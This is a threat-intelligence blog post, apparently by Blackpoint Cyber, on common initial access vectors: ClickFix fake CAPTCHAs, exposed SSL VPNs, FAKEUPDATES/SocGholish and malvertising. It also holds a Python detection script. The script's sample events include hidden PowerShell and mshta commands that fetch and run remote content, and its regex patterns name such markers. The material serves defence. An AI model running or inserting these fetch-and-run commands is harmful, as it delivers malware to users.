Stop Them Before They Start: Top Threats in the Trenches, and How to Prevent Them

Vertical Analysis

Since January, attacks have been observed across 24 verticals worldwide.

Top 3 Initial Access Vectors

While analyzing observed incidents, clear patterns emerge: 80% of initial access vectors fall into the following three categories.

Fake Captcha/ClickFix Attacks

While social engineering attacks have been around since the dawn of the internet and have been used against private individuals and companies alike, some newer techniques have become popular with threat actors and are just as effective. These attacks, tracked as FAKE CAPTCHA and CLICKFIX, accounted for about 45% of the attacks resulting in an on-prem compromise as seen by Blackpoint’s SOC.

These attacks masquerade as anti-bot CAPTCHAs. Instead of a standard challenge, a FAKE CAPTCHA instructs the user to copy a malicious command and paste it into the Windows Run dialog, opened with Win + R.

These attacks rely on the user having permission to open the Windows Run dialog and execute commands. Because the user launches the payload themselves, the attack sidesteps the usual social-engineering delivery chain (a downloaded attachment or file), making it less likely that traditional antivirus detects it before the payload is delivered and executed. Additionally, users have not been trained to recognize this form of social engineering, making them less likely to identify the attack.

SSL VPN Compromise

The SOC routinely observes valid account compromise (MITRE ID – T1078) originating from a publicly exposed VPN; publicly exposed VPNs account for 30% of the initial access vectors resulting in an on-premises compromise. This method of access offers the adversary several advantages.

  • Quieter method of intrusion. Logging in through an established entry point into an environment demands a higher standard of detection and containment capability from the defender than a noisy exploit would.
  • Edge device software commonly has critical vulnerabilities or overly permissive configurations, allowing adversaries to exploit the software and gain access to an environment.
  • Edge devices are the critical gatekeepers between internal networks and the internet. They manage and filter traffic, enforce security policies, and often provide remote access, which makes them high-value targets for threat actors. Edge devices often operate with elevated privileges and are typically exposed to the internet, and they are frequently targeted via vulnerabilities, exposed devices/portals, or misconfigurations.
  • Blackpoint’s APG has sent out 71 notices to partners since the beginning of January regarding these types of vulnerabilities. These vulnerabilities are known to be favored by several ransomware groups. Akira Ransomware, active since 2023, is one of the most well-known operations targeting SSL VPN appliances; the group frequently targets them for initial access, persistence, and defense evasion. Blackpoint SOC has been tracking an increase in exploitation of SonicWall devices by the Akira ransomware gang, which attacked numerous organizations through August and September.

How do I know if my VPN is exposed?

  • Take the public IP of your machine (this will usually be your network’s public address; make sure to grab the IP while on the corporate network rather than your home network).
  • Go to a scanner (a website or a CLI tool works; easy websites include Shodan or Censys).
  • Enter the public IP. The results will show you which services are reachable from the public internet.
  • Publicly exposed VPN login pages will point to a login web app, often matching or consistent with “https://:/remote/login”.
    • Ideally, nothing is accessible.

If there is something available to the public internet, it will show in the results.

Malicious Downloads

This category primarily involves activity such as FAKEUPDATES, user-initiated malware downloads, or otherwise suspicious tool downloads. It made up 5% of initial access.

FAKEUPDATES

19% of the malicious downloads seen by the Blackpoint SOC were related to FAKEUPDATES, a category of malware named for its disguise as a software update.

The bulk of these incidents center on fake browser updates for Google Chrome, Edge, or Firefox. The user believes they are updating their browser when in fact they are running malware.

The most common payload associated with this activity is SocGholish, a loader that is served from legitimate but compromised websites. Malicious JavaScript on the site performs initial checks to verify that the host is one the attacker wants to infect. If these checks pass, the FAKEUPDATE is displayed to the user for download.

SocGholish has been linked to several groups, including Gold Drake, Evil Corp, UNC2165, and Mustard Tempest. The loader has been connected to the deployment of remote access trojans (RATs) and of several ransomware variants, including HIVE, LOCKBIT, and WastedLocker.

This illustrates how easily a host can be infected with SocGholish, and how devastating the consequences of an unchecked infection can be.
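Detection logic for the two delivery patterns described above, ClickFix commands pasted into the Run dialog and FAKEUPDATES scripts launched from a download, as an added example that is not Blackpoint’s code. It assumes process-creation telemetry with Sysmon-style Image, ParentImage and CommandLine fields, and the sample events below are constructed, not real incident data.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events shaped like Sysmon Event ID 1 fields
# (Image, ParentImage, CommandLine). Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"id": 3, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/check.hta"},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -NoProfile"},
    {"id": 5, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Chrome_Update.js"'},
    {"id": 6, "Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cscript "C:\Scripts\inventory.js"'},
]

LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "msiexec.exe",
           "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LAUNCHERS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
# Hallmarks of a pasted one-liner: hide the window, decode, or fetch and run remote content.
CLICKFIX_MARKERS = re.compile(
    r"-w(indowstyle)?\s+hidden|-(enc|ec|encodedcommand)\b|\biex\b|invoke-expression|"
    r"downloadstring|\bmshta\s+https?://|\bcurl(\.exe)?\b.*https?://", re.I)
JS_ARG = re.compile(r'"?([A-Za-z]:\\[^"]*?\.js)"?', re.I)
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.I)

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(ev):
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    # Rule 1: ClickFix. Text pasted into Win+R is spawned by explorer.exe, so a LOLBin
    # child of explorer.exe whose command line carries download/hide markers is flagged.
    if parent == "explorer.exe" and image in LOLBINS and CLICKFIX_MARKERS.search(cmd):
        return "clickfix"
    # Rule 2: FAKEUPDATES. A script host running a .js named like an update from a
    # user-writable path, launched by the browser (or Explorer) the user downloaded it with.
    if image in SCRIPT_HOSTS and parent in LAUNCHERS:
        m = JS_ARG.search(cmd)
        if m and "update" in basename(m.group(1)) and USER_WRITABLE.search(m.group(1)):
            return "fakeupdates"
    return None

def scan(events):
    """Return (event id, verdict) pairs for every event a rule matched."""
    return [(ev["id"], v) for ev in events if (v := classify(ev))]
```

Both rules are deliberately narrow; in production, tune the marker list against your own baseline of legitimate explorer.exe-launched PowerShell and script-host activity to keep false positives down.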

A Quick Note on Malvertising

Blackpoint SOC has seen an influx of malvertising campaigns focused on distributing trojanized versions of common administrator tools, such as PuTTY. Threat actors pay for ads that place their version above the legitimate one in search engine results, making it more likely that users, commonly administrators, download and use the malicious version.

This offers several advantages over delivering malware to standard users. First, the users who commonly run these tools are more likely to be administrators in an environment, making their accounts more valuable, as they likely carry access and permissions a standard user does not. Second, because the victim is an administrator, initial reconnaissance or information gathering may not appear suspicious even if alerted on by traditional AV, as the activity can be written off as routine administrative work. Finally, otherwise suspicious activity performed by the trojanized version of the administrative software is more likely to fly under the radar because of the parent process name. In the case of trojanized PuTTY, suspicious file transfer activity has a higher likelihood of being overlooked given the user context and the program’s known use case.

Suggested Security Controls:

  • Audit account privileges: prevent users from installing software and from accessing cmd, PowerShell, and the Windows Run dialog.
  • Educate users on FakeCaptcha and ClickFix attacks.
  • Regulate access to web-app VPN login pages and minimize exposed login pages/services.
  • Ensure edge device software is regularly updated.
  • Ensure any tools downloaded come from known and legitimate websites.

Date published: October 16, 2025
Author: Blackpoint Cyber